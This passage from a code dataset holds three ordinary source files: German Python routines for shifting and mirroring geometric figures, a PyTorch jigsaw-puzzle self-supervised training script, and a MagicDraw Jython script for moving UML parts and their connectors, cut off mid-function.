streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [yVerschiebenPunkt(punkt, y)] + yVerschiebenStreckenzug(restStreckenzug, y)\r\n\r\ndef yVerschiebenFigur(figur, y):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [yVerschiebenStreckenzug(erstesElement, y)] + yVerschiebenFigur(restFigur, y)\r\n else:\r\n return [yVerschiebenFigur(erstesElement, y)] + yVerschiebenFigur(restFigur, y)\r\n\r\ndef xyVerschiebenPunkt(punkt, x, y):\r\n if istPunkt(punkt):\r\n return [punkt[0] + x, punkt[1] + y]\r\n\r\ndef xyVerschiebenStreckenzug(streckenzug, x, y):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [xyVerschiebenPunkt(punkt, x, y)] + xyVerschiebenStreckenzug(restStreckenzug, x, y)\r\n\r\ndef xyVerschiebenFigur(figur, x, y):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [xyVerschiebenStreckenzug(erstesElement, x, y)] + xyVerschiebenFigur(restFigur, x, y)\r\n else:\r\n return [xyVerschiebenFigur(erstesElement, x, y)] + xyVerschiebenFigur(restFigur, x, y)\r\n\r\ndef xSpiegelnPunkt(punkt):\r\n if istPunkt(punkt):\r\n return [punkt[0], -1 * punkt[1]]\r\n\r\ndef xSpiegelnStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return xSpiegelnStreckenzug(restStreckenzug) + [xSpiegelnPunkt(punkt)]\r\n\r\ndef xSpiegelnFigur(figur):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return xSpiegelnFigur(restFigur) + [xSpiegelnStreckenzug(erstesElement)]\r\n else:\r\n return xSpiegelnFigur(restFigur) + [xSpiegelnFigur(erstesElement)]\r\n\r\ndef ySpiegelnPunkt(punkt):\r\n if istPunkt(punkt):\r\n return [-1 * punkt[0], punkt[1]]\r\n\r\ndef ySpiegelnStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return 
ySpiegelnStreckenzug(restStreckenzug) + [ySpiegelnPunkt(punkt)]\r\n\r\ndef ySpiegelnFigur(figur):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return ySpiegelnFigur(restFigur) + [ySpiegelnStreckenzug(erstesElement)]\r\n else:\r\n return ySpiegelnFigur(restFigur) + [ySpiegelnFigur(erstesElement)]\r\n\r\n# Beispiel\r\nstuetzelinks = [[0, 0],[20, 0],[50, 100],[30, 100],[0, 0]]\r\nblockunten = [[90, 10],[110, 10],[110, 30],[90, 30],[90, 10]]\r\nblockoben = [[90, 70],[110, 70],[110, 90],[90, 90],[90, 70]]\r\nraute = [[80, 50],[100, 40],[120, 50],[100, 60],[80, 50]]\r\nverbindung1 = [[100, 110], [100, 90]]\r\nverbindung2 = [[100, 70], [100, 60]]\r\nverbindung3 = [[100, 40], [100, 30]]\r\nverbindung4 = [[100, 10], [100, 0]]\r\nverbindung5 = [[80, 50], [70, 50], [70, 100], [100, 100]]\r\nstuetzerechts = [verbindung1, blockoben, verbindung2, raute, \\\r\n verbindung5, verbindung3, blockunten, verbindung4]\r\ndach = [[10, 110],[130, 110],[130, 125],[70, 140],[10, 125],[10, 110]]\r\ntor = [stuetzelinks, stuetzerechts, dach]\r\nrahmen = [[0, 0],[140, 0],[140, 140],[0, 140],[0, 0]]\r\nlogo = [tor, rahmen]\r\n\r\n# Test\r\nzeichneFigur(logo)\r\nlogoNeu = ySpiegelnFigur(logo)\r\nzeichneFigur(logoNeu)\r\n","sub_path":"02 Algorithmen/20180208/geometrischeObjekte.py","file_name":"geometrischeObjekte.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200793037","text":"import os\nimport uuid\nimport torch\nimport torch.nn as nn\nimport models\nimport argparse\nimport torchvision\nimport tensorboardX\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nfrom utils import split_image, combine_image\nfrom ss import rotation, JigsawGenerator\n\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='Selfie')\nparser.add_argument('--data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('--dataset', type=str, default=\"CUB\")\nparser.add_argument('--arch', '-a', metavar='ARCH', default='resnet50',\n help='model architecture: ')\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=1000, type=int, metavar='N',\n help='number of steps of selfie')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-b', '--batch-size', default=32, type=int,\n metavar='N', help='mini-batch size (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--lr-method', default='step', type=str,\n help='method of learning rate')\nparser.add_argument('--lr-params', default=[], dest='lr_params',nargs='*',type=float,\n action='append', help='params of lr method')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=3e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\nparser.add_argument('--store-model-everyepoch', 
dest='store_model_everyepoch', action='store_true',\n help='store checkpoint in every epoch')\nparser.add_argument('--evaluation', action=\"store_true\")\nparser.add_argument('--resume', action=\"store_true\")\n\nparser.add_argument('--load-weights', default=None, type=str)\nparser.add_argument('--task', type=str, default=uuid.uuid1())\nparser.add_argument('--with-rotation', action=\"store_true\")\nparser.add_argument('--with-jigsaw', action=\"store_true\")\nparser.add_argument('--seperate-layer4', action=\"store_true\")\nparser.add_argument('--rotation-aug', action=\"store_true\")\n\nclass fake:\n def step():\n pass\n\ndef main():\n global args, best_prec1, summary_writer, jigsaw\n\n jigsaw = JigsawGenerator(30)\n args = parser.parse_args()\n summary_writer = tensorboardX.SummaryWriter(os.path.join('logs', args.task))\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n print(args)\n\n if args.dataset == 'CUB':\n traindir = os.path.join(args.data, 'train')\n valdir = os.path.join(args.data, 'val')\n train_transforms = transforms.Compose([\n transforms.Resize(448),\n transforms.CenterCrop(448),\n transforms.ToTensor(),\n normalize,\n ])\n val_transforms = transforms.Compose([\n transforms.Resize(448),\n transforms.CenterCrop(448),\n transforms.ToTensor(),\n normalize,\n ])\n num_classes = 200\n train_dataset = datasets.ImageFolder(traindir, train_transforms)\n val_dataset = datasets.ImageFolder(valdir, val_transforms)\n elif args.dataset == 'cifar':\n train_transforms = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n val_transforms = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n train_dataset = datasets.CIFAR10(args.data, True, train_transforms)\n val_dataset = datasets.CIFAR10(args.data, False, val_transforms)\n else:\n raise NotImplementedError\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = True)\n\n val_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True, drop_last = True)\n\n model = torchvision.models.resnet50(pretrained = False)\n if args.dataset == 'cifar':\n model.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=2, bias=False)\n \n model.fc = nn.Linear(2048, 30)\n\n criterion = nn.CrossEntropyLoss().cuda()\n if args.gpu is None:\n model = torch.nn.DataParallel(model)\n model = model.cuda()\n else:\n model = model.cuda()\n\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr,\n momentum=0.9,\n weight_decay=args.weight_decay)\n\n #scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs))\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [60, 150], 0.7)\n best_prec1 = 0\n\n if not os.path.exists(os.path.join('models', str(args.task))):\n os.mkdir(os.path.join('models', str(args.task)))\n\n for epoch in range(args.start_epoch, args.epochs):\n trainObj, top1 = train(train_loader, model, criterion, optimizer, scheduler, epoch)\n _,_ = train(val_loader, model, criterion, optimizer, fake, epoch)\n valObj, prec1 = val(val_loader, model, criterion)\n summary_writer.add_scalar(\"train_loss\", trainObj, epoch)\n summary_writer.add_scalar(\"test_loss\", valObj, epoch)\n summary_writer.add_scalar(\"train_acc\", top1, epoch)\n summary_writer.add_scalar(\"test_acc\", prec1, epoch)\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n if 
is_best:\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'checkpoint.pth.tar'))\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'model_best.pth.tar'))\n else:\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'checkpoint.pth.tar'))\n\ndef train(train_loader, model, criterion, optimizer, scheduler, epoch):\n global args\n losses = AverageMeter()\n top1 = AverageMeter()\n model.train()\n for index, (input, target) in enumerate(train_loader):\n input = input.cuda(args.gpu)\n if args.dataset == 'CUB':\n splited_list = split_image(input, 112)\n elif args.dataset == 'cifar':\n splited_list = split_image(input, 8)\n splited_list = [i.unsqueeze(1) for i in splited_list]\n jigsaw_stacked = torch.cat(splited_list, 1)\n jigsaw_stacked, target = jigsaw(jigsaw_stacked)\n jigsaw_stacked = combine_image(jigsaw_stacked, 4)\n\n output = model(jigsaw_stacked)\n\n loss = criterion(output, target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n prec1 = accuracy(output, target, topk=(1,))\n losses.update(loss.item(), input.shape[0])\n top1.update(prec1[0].item(), input.shape[0])\n\n if index % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'.format(\n epoch, index, len(train_loader), loss=losses, top1=top1))\n scheduler.step()\n return losses.avg, top1.avg\n\ndef val(val_loader, model, criterion):\n global args\n losses = AverageMeter()\n top1 = AverageMeter()\n model.eval()\n with torch.no_grad():\n for index, (input, target) in enumerate(val_loader):\n input = input.cuda(args.gpu)\n if args.dataset == 'CUB':\n splited_list = split_image(input, 112)\n elif args.dataset == 'cifar':\n splited_list = split_image(input, 8)\n splited_list = [i.unsqueeze(1) for i in splited_list]\n jigsaw_stacked = torch.cat(splited_list, 1)\n jigsaw_stacked, target = jigsaw(jigsaw_stacked)\n jigsaw_stacked = combine_image(jigsaw_stacked, 4)\n\n output = model(jigsaw_stacked)\n loss = criterion(output, target)\n\n prec1 = accuracy(output, target, topk=(1,))\n losses.update(loss.item(), input.shape[0])\n top1.update(prec1[0].item(), input.shape[0])\n\n if index % args.print_freq == 0:\n print('Epoch: [{0}/{1}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'.format(\n index, len(val_loader), loss=losses, top1=top1))\n\n return losses.avg, top1.avg\n\ndef accuracy(output, target, topk=(1,)):\n #print(output.shape)\n #print(target.shape)\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n #print(target)\n if (target.dim() > 1):\n target = torch.argmax(target, 1)\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n torch.save(state, filename[0])\n if is_best:\n shutil.copyfile(filename[0], 
filename[1])\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n main()","sub_path":"train_jigsaw.py","file_name":"train_jigsaw.py","file_ext":"py","file_size_in_byte":10944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321501202","text":"from java.lang import *\nfrom com.nomagic.magicdraw.uml.symbols import *\nfrom com.nomagic.magicdraw.core import Application\nfrom com.nomagic.uml2.ext.jmi.helpers import StereotypesHelper\nfrom com.nomagic.magicdraw.openapi.uml import SessionManager\nfrom com.nomagic.magicdraw.openapi.uml import ModelElementsManager\nfrom com.nomagic.uml2.ext.jmi.helpers import ModelHelper\nfrom com.nomagic.magicdraw.ui.dialogs import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdkernel import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mddependencies import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdinterfaces import *\nfrom com.nomagic.uml2.ext.magicdraw.actions.mdbasicactions import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdbasicactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdintermediateactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.auxiliaryconstructs.mdinformationflows import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdports import *\nfrom com.nomagic.uml2.ext.magicdraw.commonbehaviors.mdsimpletime import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdinternalstructures import *\n\nfrom com.nomagic.magicdraw.teamwork.application import TeamworkUtils\nimport sys\nimport traceback\nimport os\nfrom javax.swing import JOptionPane\nimport MDUtils._MDUtils as MDUtils\nreload(MDUtils)\nimport SRUtils\nreload(SRUtils)\n\ngl = Application.getInstance().getGUILog()\nproject = Application.getInstance().getProject()\nef = project.getElementsFactory()\nmem = ModelElementsManager.getInstance()\nsm = SessionManager.getInstance()\n\n\ndef findOppositeEnd(role1, end1, connector):\n for end in connector.getEnd():\n if end.getRole() is not role1:\n return end\n for end in connector.getEnd():\n if end is not end1:\n return end\n return None\n\ndef findPeerParts(part):\n owner = part.getOwner()\n res = []\n for p in owner.getOwnedAttribute():\n if p is not part:\n res.append(p)\n return res\n\ndef pathUnderPart(end, part):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and len(paths) > 0:\n if paths.get(0) is part:\n return True\n return False\n\ndef findPartsTypedBy(type):\n parts = type.get_typedElementOfType()\n res = []\n res.extend(parts)\n return res\n\ndef copyPropertyPaths(fromEnd, toEnd):\n paths = StereotypesHelper.getStereotypePropertyValue(fromEnd, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None:\n for path in paths:\n StereotypesHelper.setStereotypePropertyValue(toEnd, SRUtils.nestedEndS, \"propertyPath\", path, True)\n\ndef copyMultiplicity(prop, newprop):\n newprop.setLowerValue(SRUtils.cloneValueSpec(prop.getLowerValue()))\n newprop.setUpperValue(SRUtils.cloneValueSpec(prop.getUpperValue()))\n newprop.setUnique(prop.isUnique())\n newprop.setOrdered(prop.isOrdered())\n \ndef movePartDown(part, newOwner, ownerPart):\n ends = 
part.getEnd()\n asso = part.getAssociation()\n \n newasso = ef.createAssociationInstance()\n newasso.setOwner(newOwner.getOwner())\n newProp = newasso.getMemberEnd().get(0)\n newProp2 = newasso.getMemberEnd().get(1)\n newProp.setType(part.getType())\n newProp2.setType(newOwner)\n newProp.setOwner(newOwner)\n newProp2.setOwner(newasso)\n newProp.setAggregation(part.getAggregation())\n newProp.setName(part.getName())\n copyMultiplicity(part, newProp)\n MDUtils.copyStereotypes(part, newProp)\n \n bad = []\n for end in ends:\n oppend = findOppositeEnd(part, end, end.get_connectorOfEnd())\n if oppend.getRole() is part:\n bad.append(end)\n continue\n newconn = ef.createConnectorInstance()\n partend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n partend.setRole(newProp)\n newoppend.setRole(oppend.getRole())\n \n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n copyPropertyPaths(end, partend)\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n copyPropertyPaths(oppend, newoppend)\n elif end.get_connectorOfEnd().getOwner() is part.getType():\n newconn.setOwner(part.getType())\n copyPropertyPaths(oppend, newoppend)\n elif not StereotypesHelper.hasStereotype(oppend, SRUtils.nestedEndS):\n if oppend.getRole() is ownerPart:\n newconn.setOwner(newOwner)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner()) \n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n else:\n if pathUnderPart(oppend, ownerPart):\n newconn.setOwner(newOwner)\n paths = []\n proppath = StereotypesHelper.getStereotypePropertyValue(oppend, \"NestedConnectorEnd\", \"propertyPath\")\n paths.extend(proppath)\n if len(paths) == 1:\n pass\n else:\n newpaths = paths[1:]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True) \n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n copyPropertyPaths(oppend, newoppend)\n movePartDownPorts(part, newOwner, ownerPart, newProp)\n movePartDownChildren(part, newOwner, ownerPart, newProp)\n if len(bad) > 0:\n gl.log(\"There's one or more connector from the original part to itself, those are not replicated\")\n mem.removeElement(part)\n\ndef movePartDownChildren(part, newOwner, ownerPart, newProp):\n childs = []\n findAllChildrenParts(part, childs)\n for child in childs:\n for end in list(child.getEnd()):\n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and part in paths:\n newconn = ef.createConnectorInstance()\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n \n opppaths = StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if opppaths is not None and len(opppaths) > 0 and opppaths.get(0) is ownerPart:\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n newpath = opppaths[1:]\n for path in 
newpath:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n elif oppend.getRole() is ownerPart:\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n index = paths.indexOf(part)\n firstpart = paths[:index]\n secondpart = paths[index+1:]\n newpath = []\n newpath.extend(firstpart)\n newpath.append(ownerPart)\n newpath.append(newProp)\n newpath.extend(secondpart)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n\n\ndef findAllChildrenParts(part, childs):\n type = part.getType()\n if type is not None and isinstance(type, Class):\n for attr in type.getOwnedAttribute():\n if not isinstance(attr, Port):\n if attr not in childs:\n childs.append(attr)\n findAllChildrenParts(attr, childs)\n \n \ndef movePartDownPorts(part, newOwner, ownerPart, newProp):\n portends = findPortEnds(part)\n for end in portends:\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newconn = ef.createConnectorInstance()\n newconn.getEnd().get(0).setRole(end.getRole())\n newconn.getEnd().get(1).setRole(oppend.getRole())\n portend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if len(paths) > 1:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n newpaths = paths[:-1]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n copyPropertyPaths(oppend, newoppend)\n else:\n oppathes = StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if len(oppathes) > 0 and oppathes.get(0) is ownerPart:\n newconn.setOwner(newOwner)\n if len(oppathes) > 1:\n newoppathes = oppathes[1:]\n for path in newoppathes:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n copyPropertyPaths(oppend, newoppend)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n mem.removeElement(end.get_connectorOfEnd())\n \n \n \ndef movePartUp(part, newOwner, partInOwner):\n ends = part.getEnd()\n \n newasso = ef.createAssociationInstance()\n newasso.setOwner(newOwner.getOwner())\n newProp = newasso.getMemberEnd().get(0)\n newProp2 = newasso.getMemberEnd().get(1)\n newProp.setType(part.getType())\n newProp2.setType(newOwner)\n newProp.setOwner(newOwner)\n newProp2.setOwner(newasso)\n newProp.setAggregation(part.getAggregation())\n newProp.setName(part.getName())\n 
copyMultiplicity(part, newProp)\n\n MDUtils.copyStereotypes(part, newProp)\n bad = []\n for end in ends:\n oppend = findOppositeEnd(part, end, end.get_connectorOfEnd())\n if oppend.getRole() is part:\n bad.append(end)\n continue\n newconn = ef.createConnectorInstance()\n partend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n partend.setRole(newProp)\n newoppend.setRole(oppend.getRole())\n \n if not StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n if end.get_connectorOfEnd().getOwner() is part.getType():\n newconn.setOwner(part.getType())\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(newOwner)\n if oppend.getRole() is not partInOwner:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", partInOwner, True)\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None:\n connectorOwner = end.get_connectorOfEnd().getOwner()\n newpaths = []\n findPath(connectorOwner, newProp, newpaths)\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n movePartUpPorts(part, newOwner, partInOwner, newProp)\n movePartUpChildren(part, newOwner, partInOwner, newProp)\n if len(bad) > 0:\n gl.log(\"There's one or more connector from the original part to itself, those are not replicated\")\n mem.removeElement(part)\n\ndef movePartUpChildren(part, newOwner, partInOwner, newProp):\n childs = []\n findAllChildrenParts(part, childs)\n for child in childs:\n for end in list(child.getEnd()):\n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and part in paths:\n index = paths.indexOf(part)\n if index > 0:\n if paths[index-1] is partInOwner:\n newconn = ef.createConnectorInstance()\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n firstpart = paths[:index-1]\n secondpart = paths[index+1:]\n newpath = []\n newpath.extend(firstpart)\n newpath.append(newProp)\n newpath.extend(secondpart)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n else:\n pass #this means this connector is going through some other part whose type originally owns part, but since part's no longer under type, what happens?\n else:\n # this means the connector is owned by something that owns a part whose type used to contain part, the connector needs to move up\n newconn = ef.createConnectorInstance()\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n opppath = 
StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if oppend.getRole() is partInOwner:\n pass\n else:\n newpath = [partInOwner]\n newpath.extend(opppath)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n mem.removeElement(end.get_connectorOfEnd())\n else:\n pass #no need to fix?\n else:\n pass #no need to fix?\n \n\n\ndef movePartUpPorts(part, newOwner, partInOwner, newProp):\n portends = findPortEnds(part)\n for end in portends:\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newconn = ef.createConnectorInstance()\n newconn.getEnd().get(0).setRole(end.getRole())\n newconn.getEnd().get(1).setRole(oppend.getRole())\n portend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n portend.setPartWithPort(newProp)\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if len(paths) > 1:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n newpaths = paths[:-2]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(newOwner)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", partInOwner, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n \n \ndef findPath(owner, part, parts):\n for attr in owner.getOwnedAttribute():\n if attr is part:\n return True\n parts.append(attr)\n attrtype = attr.getType()\n if attrtype is not None and isinstance(attrtype, Class):\n if findPath(attrtype, part, parts):\n return True\n parts.remove(attr)\n return False\n \ndef findPortEnds(part):\n partType = part.getType()\n ports = []\n ends = []\n for attr in partType.getOwnedAttribute():\n if isinstance(attr, Port):\n ports.append(attr)\n for port in ports:\n for end in port.getEnd():\n if end.getPartWithPort() is part:\n ends.append(end)\n return ends\n \ndef moveup(part):\n partowner = part.getOwner()\n parts = findPartsTypedBy(partowner)\n owners = []\n for part1 in parts:\n if part1.getOwner() not in owners and isinstance(part1.getOwner(), Class):\n owners.append(part1.getOwner())\n owner = MDUtils.getUserDropdownSelection(\"Choose new owner\", \"choose new owner\", owners)\n ownerpart = None\n for attr in owner.getOwnedAttribute():\n if attr.getType() is partowner:\n ownerpart = attr\n movePartUp(part, owner, ownerpart)\n \ndef movedown(part):\n parts = findPeerParts(part)\n ownerPart = MDUtils.getUserDropdownSelection(\"Choose part\", \"Choose which peer part you want to move under:\", parts)\n movePartDown(part, ownerPart.getType(), ownerPart)\n\ndef run(mode):\n selected = None\n if mode == 'b':\n selected = 